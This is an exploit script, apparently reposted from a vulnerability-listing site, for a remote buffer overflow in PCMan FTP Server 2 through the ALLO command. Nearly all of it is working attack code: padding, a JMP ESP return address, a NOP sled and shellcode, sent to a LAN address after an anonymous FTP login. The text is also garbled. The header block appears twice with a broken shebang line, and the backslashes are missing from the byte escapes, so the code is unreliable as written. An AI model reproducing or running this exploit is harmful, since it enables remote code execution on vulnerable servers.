# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
#!/usr # Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow
# Discovered by: Nassim Asrir
# Tested on: win7 x32
# Thanks To : Chagi-Lagi - MY.Neggaoui
#!/usr/bin/python2.7
# -*- coding: utf-8 -*
import socket
ret = "xf7xf8xc5x75" #@ JMP ESP Kernel32.dll
calc =("xddxc5xd9x74x24xf4x5ax31xc9xb8xd1x96xc1xcbxb1"
"x33x31x42x17x83xc2x04x03x93x85x23x3exefx42x2a"
"xc1x0fx93x4dx4bxeaxa2x5fx2fx7fx96x6fx3bx2dx1b"
"x1bx69xc5xa8x69xa6xeax19xc7x90xc5x9axe9x1cx89"
"x59x6bxe1xd3x8dx4bxd8x1cxc0x8ax1dx40x2bxdexf6"
"x0fx9excfx73x4dx23xf1x53xdax1bx89xd6x1cxefx23"
"xd8x4cx40x3fx92x74xeax67x03x85x3fx74x7fxccx34"
"x4fx0bxcfx9cx81xf4xfexe0x4excbxcfxecx8fx0bxf7"
"x0exfax67x04xb2xfdxb3x77x68x8bx21xdfxfbx2bx82"
"xdex28xadx41xecx85xb9x0exf0x18x6dx25x0cx90x90"
"xeax85xe2xb6x2excexb1xd7x77xaax14xe7x68x12xc8"
"x4dxe2xb0x1dxf7xa9xdexe0x75xd4xa7xe3x85xd7x87"
"x8bxb4x5cx48xcbx48xb7x2dx23x03x9ax07xacxcax4e"
"x1axb1xecxa4x58xccx6ex4dx20x2bx6ex24x25x77x28"
"xd4x57xe8xddxdaxc4x09xf4xb8x8bx99x94x10x2ex1a"
"x3ex6d")
buffer1= 'x41' * 2007 + ret + "x90" * 40 + calc
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.108.129',21))
s.recv(1024)
s.send('USER anonymous
')
s.recv(1024)
s.send('PASS
')
s.recv(1024)
s.send('ALLO' + buffer1 + '
')
s.close()
PCMan FTP Server 2 ALLO Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 298